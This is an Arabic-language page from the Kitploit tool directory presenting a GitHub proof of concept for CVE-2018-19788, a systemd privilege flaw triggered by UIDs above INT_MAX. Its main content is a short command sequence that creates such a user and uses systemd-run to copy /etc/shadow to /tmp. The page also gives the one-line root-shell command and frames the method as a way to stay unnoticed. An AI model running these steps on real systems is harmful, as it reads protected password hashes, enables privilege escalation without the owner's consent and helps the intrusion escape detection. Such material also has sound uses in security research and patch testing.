Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PoC — استغلال CVE-2018-19788 بدون قذائف الجذر | Kitploit
أدوات/GitHubGitHub/ekultek/poc
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالاختبار الاختراقالفريق الأحمر
GitHubekultek/poc

PoC

استغلال CVE-2018-19788 بدون قذائف الجذر

عرض المستودع
197منذ 7 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال CVE-2018-19788 لتفريغ الملفات المحمية دون شل جذر

CVE-2018-19788 هي ثغرة تسمح لأي مستخدم بمعرّف UID أكبر من INT_MAX (أي 4000000000) بتشغيل أي أمر systemctl على جهاز لينكس يعمل بـ systemd، مثل Ubuntu. (يوجد بالفعل مقال للحصول على شل جذر: هنا). الفرق الرئيسي بين هذا المقال ومقال الشل الجذر الكامل هو أن هذا يُنفَّذ بصلاحيات المستخدم نفسه بدلاً من مستخدم الجذر (في الأساس مجرد إثبات مفهوم PoC بصراحة)

الحصول على /etc/shadow دون تشغيل شل جذر

للحصول على شل جذر، الأمر في غاية البساطة: تشغيل systemd-run -t /bin/bash، لكن إذا أردت البقاء بعيدًا عن الأنظار يمكنك تشغيل أوامر بسيطة للحصول على ملفات تتطلب صلاحيات مرتفعة دون الحاجة إلى طرفية. اتبع هذه الخطوات لفعل ذلك:

  • أضف مستخدمًا بمعرّف UID أعلى من INT_MAX:
    root@kitploit:~
    adduser --uid 4000000000 someusername
    
  • بدّل إلى حساب المستخدم:
    root@kitploit:~
    su someusername
    
  • نفّذ الأمر لأي ملف تريده (سنستخدم /etc/shadow في هذا المثال):
    root@kitploit:~
    systemd-run bash -c 'cat /etc/shadow > /tmp/results_poc.txt'
    
  • ملفك الآن في /tmp:
    root@kitploit:~
    cat /tmp/results_poc.txt
    

فيديو PoC

to_video

تنزيل الأداة